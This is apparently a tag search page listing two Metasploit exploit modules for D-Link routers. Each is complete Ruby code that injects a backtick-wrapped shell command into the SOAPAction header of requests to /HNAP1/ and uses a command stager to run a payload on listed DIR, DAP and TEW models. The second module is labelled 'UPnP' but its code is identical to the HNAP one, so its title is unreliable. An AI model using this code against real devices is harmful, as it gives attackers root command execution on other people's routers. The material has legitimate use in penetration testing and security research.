Showing results for tags 'revb'.

Found 2 results

  1.

     ```ruby
     ##
     # This module requires Metasploit: http://metasploit.com/download
     # Current source: https://github.com/rapid7/metasploit-framework
     ##

     require 'msf/core'

     class Metasploit3 < Msf::Exploit::Remote
       Rank = NormalRanking

       include Msf::Exploit::Remote::HttpClient
       include Msf::Exploit::CmdStager

       def initialize(info = {})
         super(update_info(info,
           'Name'        => 'D-Link Devices HNAP SOAPAction-Header Command Execution',
           'Description' => %q{
             Different D-Link Routers are vulnerable to OS command injection in the HNAP SOAP
             interface. Since it is a blind OS command injection vulnerability, there is no
             output for the executed command. This module has been tested on a DIR-645 device.
             The following devices are also reported as affected: DAP-1522 revB, DAP-1650 revB,
             DIR-880L, DIR-865L, DIR-860L revA, DIR-860L revB DIR-815 revB, DIR-300 revB,
             DIR-600 revB, DIR-645, TEW-751DR, TEW-733GR
           },
           'Author'      =>
             [
               'Samuel Huntley', # first public documentation of this Vulnerability on DIR-645
               'Craig Heffner',  # independent Vulnerability discovery on different other routers
               'Michael Messner <devnull[at]s3cur1ty.de>' # Metasploit module
             ],
           'License'     => MSF_LICENSE,
           'References'  =>
             [
               ['URL', 'http://securityadvisories.dlink.com/security/publication.aspx?name=SAP10051'],
               ['URL', 'http://www.devttys0.com/2015/04/hacking-the-d-link-dir-890l/']
             ],
           'DisclosureDate' => 'Feb 13 2015',
           'Privileged'     => true,
           'Platform'       => 'linux',
           'Targets'        =>
             [
               [ 'MIPS Little Endian',
                 {
                   'Arch' => ARCH_MIPSLE
                 }
               ],
               [ 'MIPS Big Endian', # unknown if there are BE devices out there ... but in case we have a target
                 {
                   'Arch' => ARCH_MIPSBE
                 }
               ]
             ],
           'DefaultTarget'  => 0
           ))

         deregister_options('CMDSTAGER::DECODER', 'CMDSTAGER::FLAVOR')
       end

       def check
         uri = '/HNAP1/'
         soap_action = 'http://purenetworks.com/HNAP1/GetDeviceSettings'

         begin
           res = send_request_cgi({
             'uri'     => uri,
             'method'  => 'GET',
             'headers' => {
               'SOAPAction' => soap_action,
             }
           })

           if res && [200].include?(res.code) && res.body =~ /D-Link/
             return Exploit::CheckCode::Detected
           end
         rescue ::Rex::ConnectionError
           return Exploit::CheckCode::Unknown
         end

         Exploit::CheckCode::Unknown
       end

       def exploit
         print_status("#{peer} - Trying to access the device ...")

         unless check == Exploit::CheckCode::Detected
           fail_with(Failure::Unknown, "#{peer} - Failed to access the vulnerable device")
         end

         print_status("#{peer} - Exploiting...")

         execute_cmdstager(
           :flavor  => :echo,
           :linemax => 200,
           :temp    => ''
         )
       end

       def execute_command(cmd, opts)
         uri = '/HNAP1/'

         # we can not use / in our command so we need to use a little trick
         cmd_new = 'cd && cd tmp && export PATH=$PATH:. && ' << cmd
         soap_action = "http://purenetworks.com/HNAP1/GetDeviceSettings/`#{cmd_new}`"

         begin
           res = send_request_cgi({
             'uri'     => uri,
             'method'  => 'GET',
             'headers' => {
               'SOAPAction' => soap_action,
             }
           }, 3)
         rescue ::Rex::ConnectionError
           fail_with(Failure::Unreachable, "#{peer} - Failed to connect to the web server")
         end
       end
     end
     ```

     Source
  2.

     ```ruby
     ##
     # This module requires Metasploit: http://metasploit.com/download
     # Current source: https://github.com/rapid7/metasploit-framework
     ##

     require 'msf/core'

     class Metasploit3 < Msf::Exploit::Remote
       Rank = NormalRanking

       include Msf::Exploit::Remote::HttpClient
       include Msf::Exploit::CmdStager

       def initialize(info = {})
         super(update_info(info,
           'Name'        => 'D-Link Devices UPnP SOAPAction-Header Command Execution',
           'Description' => %q{
             Different D-Link Routers are vulnerable to OS command injection in the UPnP SOAP
             interface. Since it is a blind OS command injection vulnerability, there is no
             output for the executed command. This module has been tested on a DIR-645 device.
             The following devices are also reported as affected: DAP-1522 revB, DAP-1650 revB,
             DIR-880L, DIR-865L, DIR-860L revA, DIR-860L revB DIR-815 revB, DIR-300 revB,
             DIR-600 revB, DIR-645, TEW-751DR, TEW-733GR
           },
           'Author'      =>
             [
               'Samuel Huntley', # first public documentation of this Vulnerability on DIR-645
               'Craig Heffner',  # independent Vulnerability discovery on different other routers
               'Michael Messner <devnull[at]s3cur1ty.de>' # Metasploit module
             ],
           'License'     => MSF_LICENSE,
           'References'  =>
             [
               ['URL', 'http://securityadvisories.dlink.com/security/publication.aspx?name=SAP10051'],
               ['URL', 'http://www.devttys0.com/2015/04/hacking-the-d-link-dir-890l/']
             ],
           'DisclosureDate' => 'Feb 13 2015',
           'Privileged'     => true,
           'Platform'       => 'linux',
           'Targets'        =>
             [
               [ 'MIPS Little Endian',
                 {
                   'Arch' => ARCH_MIPSLE
                 }
               ],
               [ 'MIPS Big Endian', # unknown if there are BE devices out there ... but in case we have a target
                 {
                   'Arch' => ARCH_MIPSBE
                 }
               ]
             ],
           'DefaultTarget'  => 0
           ))

         deregister_options('CMDSTAGER::DECODER', 'CMDSTAGER::FLAVOR')
       end

       def check
         uri = '/HNAP1/'
         soap_action = 'http://purenetworks.com/HNAP1/GetDeviceSettings'

         begin
           res = send_request_cgi({
             'uri'     => uri,
             'method'  => 'GET',
             'headers' => {
               'SOAPAction' => soap_action,
             }
           })

           if res && [200].include?(res.code) && res.body =~ /D-Link/
             return Exploit::CheckCode::Detected
           end
         rescue ::Rex::ConnectionError
           return Exploit::CheckCode::Unknown
         end

         Exploit::CheckCode::Unknown
       end

       def exploit
         print_status("#{peer} - Trying to access the device ...")

         unless check == Exploit::CheckCode::Detected
           fail_with(Failure::Unknown, "#{peer} - Failed to access the vulnerable device")
         end

         print_status("#{peer} - Exploiting...")

         execute_cmdstager(
           :flavor  => :echo,
           :linemax => 200,
           :temp    => ''
         )
       end

       def execute_command(cmd, opts)
         uri = '/HNAP1/'

         # we can not use / in our command so we need to use a little trick
         cmd_new = 'cd && cd tmp && export PATH=$PATH:. && ' << cmd
         soap_action = "http://purenetworks.com/HNAP1/GetDeviceSettings/`#{cmd_new}`"

         begin
           res = send_request_cgi({
             'uri'     => uri,
             'method'  => 'GET',
             'headers' => {
               'SOAPAction' => soap_action,
             }
           }, 3)
         rescue ::Rex::ConnectionError
           fail_with(Failure::Unreachable, "#{peer} - Failed to connect to the web server")
         end
       end
     end
     ```

     Source